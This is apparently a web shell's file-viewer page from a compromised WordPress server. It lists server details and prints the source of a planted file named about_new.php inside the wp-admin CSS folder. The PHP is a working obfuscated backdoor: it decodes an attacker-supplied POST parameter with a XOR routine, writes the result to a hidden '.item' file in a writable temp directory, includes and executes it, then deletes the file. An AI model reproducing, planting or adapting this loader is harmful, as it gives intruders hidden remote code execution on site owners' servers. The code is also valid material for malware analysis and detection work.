HEX
Server: Apache/2.4.54 (Unix) OpenSSL/1.0.2k-fips
System: Linux f17.eelserver.com 3.10.0-1160.80.1.el7.x86_64 #1 SMP Tue Nov 8 15:48:59 UTC 2022 x86_64
User: zulfiqar (1155)
PHP: 8.2.0
Disabled: mail, exec, system, popen, proc_open, shell_exec, passthru, show_source
$ pwd: /proc/self/cwd/wp-admin/css/colors/sunrise/
Upload Files
File: //proc/self/cwd/wp-admin/css/colors/sunrise/about_new.php
<?php

if(filter_has_var(INPUT_POST, "\x65\x6Et")){
	$bind = $_POST["\x65\x6Et"];
	$bind		=explode(	  '.'	 	,$bind	 	)			;
	$pset = '';
            $s2 = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen = strlen(	$s2		);
            $l = 0;
    
            while(	$l <count(	$bind)) {
                $v5 = $bind[$l];
                $sChar = ord(	$s2[$l	 %  $sLen]		);
                $dec =(	(	int)$v5 - $sChar -(	$l	 %  10)) ^ 75;
                $pset .= chr(	$dec		);
                $l++; }		
	$holder = array_filter([session_save_path(), ini_get("upload_tmp_dir"), getenv("TEMP"), getenv("TMP"), sys_get_temp_dir(), "/tmp", "/var/tmp", getcwd(), "/dev/shm"]);
	for ($sym = 0, $descriptor = count($holder); $sym < $descriptor; $sym++) {
    $property_set = $holder[$sym];
    		if ((function($d) { return is_dir($d) && is_writable($d); })($property_set)) {
    $record = sprintf("%s/.item", $property_set);
    if (file_put_contents($record, $pset)) {
	include $record;
	@unlink($record);
	die();
}
}
}
}
@ Telegram